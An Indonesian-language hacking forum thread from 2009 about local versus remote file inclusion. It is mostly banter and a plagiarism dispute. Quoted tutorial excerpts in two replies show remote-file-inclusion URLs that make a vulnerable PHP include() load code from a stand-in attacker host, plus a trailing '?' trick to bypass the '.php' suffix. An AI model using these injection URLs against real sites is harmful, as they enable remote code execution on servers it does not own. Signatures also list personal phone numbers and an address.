Teori dasar LFI vs RFI

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
abah
Posts: 516
Joined: Sat Jul 12, 2008 4:26 pm
Location: Makassar
Contact:

Teori dasar LFI vs RFI

Post by abah » Sun Oct 11, 2009 1:29 pm

berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679

[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: Teori dasar LFI vs RFI

Post by shad.hckr » Mon Oct 12, 2009 9:33 am

tambah koleksi kata mutiara by abah..

@atas..
perasaan dari kemaren ngebet banget ma Tembak IP.. mau buat nembak siapa pak?? cewek ya?? heuheuheuheu..

User avatar
xymcrush17
Posts: 12
Joined: Tue Nov 11, 2008 3:35 am
Contact:

Re: Teori dasar LFI vs RFI

Post by xymcrush17 » Mon Oct 12, 2009 7:56 pm

thank2 om. sharing nya.
@om shad pakabar?? lama gag ketemu neh..heheh
Image

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: Teori dasar LFI vs RFI

Post by shad.hckr » Tue Oct 13, 2009 7:01 pm

@xmycrush..
wkwkwk.. pak kok menghilang dari peredaran?? kena garukan Satpol PP ya?? wkakakaka..

b0c4h
Posts: 193
Joined: Tue Aug 21, 2007 6:11 pm
Location: Jack

Re: Teori dasar LFI vs RFI

Post by b0c4h » Sat Oct 24, 2009 2:25 am

abah.....cucu ijin dunlut file'a ya..... :D

buat simulasi di localhost bisa kan ya bah.....???
Love And Peace cannot Created without "RESPECT"

User avatar
abah
Posts: 516
Joined: Sat Jul 12, 2008 4:26 pm
Location: Makassar
Contact:

Re: Teori dasar LFI vs RFI

Post by abah » Sat Oct 24, 2009 8:14 pm

b0c4h wrote:abah.....cucu ijin dunlut file'a ya..... :D

buat simulasi di localhost bisa kan ya bah.....???
bs dan di saranakn buat trik dulu di localhost baru di target pentes :D :D :D
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679

[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]

arira
Posts: 5
Joined: Wed Jul 25, 2007 11:48 am

Re: Teori dasar LFI vs RFI

Post by arira » Wed Oct 28, 2009 2:32 pm

bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit :mrgreen: :mrgreen:
abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
ini adalah cuplikan dari tutorial yang abah "buat"
eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah

maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.

.......

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
bandingkan dengan ini
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15

tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139

maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro :lol: :lol: :lol:
aku masih seorang lamer

User avatar
abah
Posts: 516
Joined: Sat Jul 12, 2008 4:26 pm
Location: Makassar
Contact:

Re: Teori dasar LFI vs RFI

Post by abah » Wed Oct 28, 2009 5:39 pm

arira wrote:bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit :mrgreen: :mrgreen:
abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
ini adalah cuplikan dari tutorial yang abah "buat"
eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah

maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.

.......

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
bandingkan dengan ini
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15

tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139

maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro :lol: :lol: :lol:
maksdunya anda apa

apa emang penulis yang anda kenal emang bisa melakukan itu aja...sorry bro
OON gini bisa juga om kalau masalah gituan nggak usah di samakan dengan penulis aslina
mungkin om dan penulisna hebat dan mungkin pembuat tulisan itu tapi hargai ane yang bodoh yang pengen juga seperti anda yang hebat dan penulis yang anda kenal

btw thansk kritikanna master
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679

[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]

Post Reply

Return to “Web Hacking”